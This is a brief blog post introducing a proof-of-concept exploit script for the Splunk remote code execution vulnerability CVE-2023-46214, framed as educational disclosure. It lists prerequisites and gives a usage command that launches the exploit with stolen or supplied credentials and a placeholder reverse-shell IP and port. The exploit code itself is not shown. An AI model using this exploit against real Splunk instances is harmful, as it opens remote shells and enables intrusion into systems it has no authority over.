Splunk RCE – PoC: In-Depth Analysis and Exploitation Methodology

This article delves into a critical vulnerability in Splunk, identified as CVE-2023-46214. It provides a detailed analysis and a Proof of Concept (PoC) script to demonstrate the vulnerability’s exploitation. The script is designed for educational purposes, helping to understand the security implications of this vulnerability in Splunk, a popular data processing and analytics platform. The article emphasizes responsible usage, strictly for research and educational purposes, highlighting the potential risks and the necessary precautions to mitigate unauthorized access or misuse.

Usage

The Splunk instance URL, username, password, reverse shell IP, and port are all required as command-line parameters. For example:

$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Prerequisites

Splunk credentials with upload permission to adddatamethods
- Note: another vector might be possible, this is just what I used
Splunk is not running on SHC mode

Analysis

I’ve written a blog post detailing the methodology taken to uncover this vulnerability. If you are running into any issues with the script, the blog could be helpful as it details the manual steps for exploitation.

Analysis of CVE-2023-46214 + PoC

Understanding And Utilizing The Tomcat – CVE-2024-50379 Proof-of-Concept (PoC)

February 4, 2025

In "Cyber security"

PoC : Understanding PoC Repositories For CVEs And Vulnerabilities

February 13, 2025

In "Cyber security"

LiteSpeed Cache Privilege Escalation PoC – CVE-2024-28000

August 28, 2024

In "Vulnerability Analysis"

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.